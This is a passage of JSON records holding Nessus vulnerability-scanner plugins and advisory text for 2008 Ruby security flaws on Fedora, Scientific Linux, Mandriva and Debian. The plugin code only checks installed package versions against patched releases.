([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"ruby-1.8.6.287-2.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:44:02", "description": "The Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : ruby on SL3.x, SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20081021_RUBY_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60485", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60485);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n\n script_name(english:\"Scientific Linux Security Update : ruby on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0810&L=scientific-linux-errata&T=0&P=2062\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0d1a4fd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"irb-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"irb-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-devel-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-docs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-libs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-mode-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-tcltk-1.8.1-7.el4_7.1\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-devel-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-libs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T11:51:59", "description": "A denial of service condition was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite loop and\ncrash (CVE-2008-3443).\n\nA number of flaws were found in Ruby that could allow an attacker to\ncreate a carefully crafted script that could allow for the bypass of\ncertain safe-level restrictions (CVE-2008-3655).\n\nA denial of service vulnerability was found in Ruby's HTTP server\ntoolkit, WEBrick. A remote attacker could send a specially crafted\nHTTP request to a WEBrick server that would cause it to use an\nexcessive amount of CPU time (CVE-2008-3656).\n\nAn insufficient taintness check issue was found in Ruby's DL module, a\nmodule that provides direct access to the C language functions. This\nflaw could be used by an attacker to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted input (CVE-2008-3657).\n\nA denial of service condition in Ruby's XML document parsing module\n(REXML) could cause a Ruby application using the REXML module to use\nan excessive amount of CPU and memory via XML documents with large XML\nentitity definitions recursion (CVE-2008-3790).\n\nThe Ruby DNS resolver library used predictable transaction IDs and a\nfixed source port when sending DNS requests. This could be used by a\nremote attacker to spoof a malicious reply to a DNS query\n(CVE-2008-3905).\n\nThe updated packages have been patched to correct these issues.", "edition": 26, "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : ruby (MDVSA-2008:226)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:ruby", "p-cpe:/a:mandriva:linux:ruby-doc", "cpe:/o:mandriva:linux:2008.1", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:ruby-tk", "p-cpe:/a:mandriva:linux:ruby-devel"], "id": "MANDRIVA_MDVSA-2008-226.NASL", "href": "https://www.tenable.com/plugins/nessus/38018", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:226. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38018);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_xref(name:\"MDVSA\", value:\"2008:226\");\n\n script_name(english:\"Mandriva Linux Security Advisory : ruby (MDVSA-2008:226)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A denial of service condition was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite loop and\ncrash (CVE-2008-3443).\n\nA number of flaws were found in Ruby that could allow an attacker to\ncreate a carefully crafted script that could allow for the bypass of\ncertain safe-level restrictions (CVE-2008-3655).\n\nA denial of service vulnerability was found in Ruby's HTTP server\ntoolkit, WEBrick. A remote attacker could send a specially crafted\nHTTP request to a WEBrick server that would cause it to use an\nexcessive amount of CPU time (CVE-2008-3656).\n\nAn insufficient taintness check issue was found in Ruby's DL module, a\nmodule that provides direct access to the C language functions. This\nflaw could be used by an attacker to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted input (CVE-2008-3657).\n\nA denial of service condition in Ruby's XML document parsing module\n(REXML) could cause a Ruby application using the REXML module to use\nan excessive amount of CPU and memory via XML documents with large XML\nentitity definitions recursion (CVE-2008-3790).\n\nThe Ruby DNS resolver library used predictable transaction IDs and a\nfixed source port when sending DNS requests. This could be used by a\nremote attacker to spoof a malicious reply to a DNS query\n(CVE-2008-3905).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-devel-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-doc-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ruby-tk-1.8.6-5.3mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-devel-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-doc-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"ruby-tk-1.8.6-9p114.2mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:45:07", "description": "Several vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-3655\n Keita Yamaguchi discovered that several safe level\n restrictions are insufficiently enforced.\n\n - CVE-2008-3656\n Christian Neukirchen discovered that the WebRick module\n uses inefficient algorithms for HTTP header splitting,\n resulting in denial of service through resource\n exhaustion.\n\n - CVE-2008-3657\n It was discovered that the dl module doesn't perform\n taintness checks.\n\n - CVE-2008-3790\n Luka Treiber and Mitja Kolsek discovered that\n recursively nested XML entities can lead to denial of\n service through resource exhaustion in rexml.\n\n - CVE-2008-3905\n Tanaka Akira discovered that the resolv module uses\n sequential transaction IDs and a fixed source port for\n DNS queries, which makes it more vulnerable to DNS\n spoofing attacks.", "edition": 28, "published": "2008-10-13T00:00:00", "title": "Debian DSA-1651-1 : ruby1.8 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2008-10-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby1.8", "cpe:/o:debian:debian_linux:4.0"], "id": "DEBIAN_DSA-1651.NASL", "href": "https://www.tenable.com/plugins/nessus/34387", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1651. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34387);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30802, 31699);\n script_xref(name:\"DSA\", value:\"1651\");\n\n script_name(english:\"Debian DSA-1651-1 : ruby1.8 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-3655\n Keita Yamaguchi discovered that several safe level\n restrictions are insufficiently enforced.\n\n - CVE-2008-3656\n Christian Neukirchen discovered that the WebRick module\n uses inefficient algorithms for HTTP header splitting,\n resulting in denial of service through resource\n exhaustion.\n\n - CVE-2008-3657\n It was discovered that the dl module doesn't perform\n taintness checks.\n\n - CVE-2008-3790\n Luka Treiber and Mitja Kolsek discovered that\n recursively nested XML entities can lead to denial of\n service through resource exhaustion in rexml.\n\n - CVE-2008-3905\n Tanaka Akira discovered that the resolv module uses\n sequential transaction IDs and a fixed source port for\n DNS queries, which makes it more vulnerable to DNS\n spoofing attacks.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1651\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ruby1.8 packages.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.8.5-4etch3. Packages for arm will be provided later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"irb1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbm-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libgdbm-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libopenssl-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libreadline-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.8-dbg\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libtcltk-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"rdoc1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ri1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-dev\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-elisp\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-examples\", reference:\"1.8.5-4etch3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:45:07", "description": "Several vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-3655\n Keita Yamaguchi discovered that several safe level\n restrictions are insufficiently enforced.\n\n - CVE-2008-3656\n Christian Neukirchen discovered that the WebRick module\n uses inefficient algorithms for HTTP header splitting,\n resulting in denial of service through resource\n exhaustion.\n\n - CVE-2008-3657\n It was discovered that the dl module doesn't perform\n taintness checks.\n\n - CVE-2008-3790\n Luka Treiber and Mitja Kolsek discovered that\n recursively nested XML entities can lead to denial of\n service through resource exhaustion in rexml.\n\n - CVE-2008-3905\n Tanaka Akira discovered that the resolv module uses\n sequential transaction IDs and a fixed source port for\n DNS queries, which makes it more vulnerable to DNS\n spoofing attacks.", "edition": 28, "published": "2008-10-13T00:00:00", "title": "Debian DSA-1652-1 : ruby1.9 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2008-10-13T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:ruby1.9"], "id": "DEBIAN_DSA-1652.NASL", "href": "https://www.tenable.com/plugins/nessus/34388", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1652. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34388);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30802, 31699);\n script_xref(name:\"DSA\", value:\"1652\");\n\n script_name(english:\"Debian DSA-1652-1 : ruby1.9 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-3655\n Keita Yamaguchi discovered that several safe level\n restrictions are insufficiently enforced.\n\n - CVE-2008-3656\n Christian Neukirchen discovered that the WebRick module\n uses inefficient algorithms for HTTP header splitting,\n resulting in denial of service through resource\n exhaustion.\n\n - CVE-2008-3657\n It was discovered that the dl module doesn't perform\n taintness checks.\n\n - CVE-2008-3790\n Luka Treiber and Mitja Kolsek discovered that\n recursively nested XML entities can lead to denial of\n service through resource exhaustion in rexml.\n\n - CVE-2008-3905\n Tanaka Akira discovered that the resolv module uses\n sequential transaction IDs and a fixed source port for\n DNS queries, which makes it more vulnerable to DNS\n spoofing attacks.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1652\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ruby1.9 packages.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.9.0+20060609-1etch3. Packages for arm will be provided\nlater.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/12\");\n 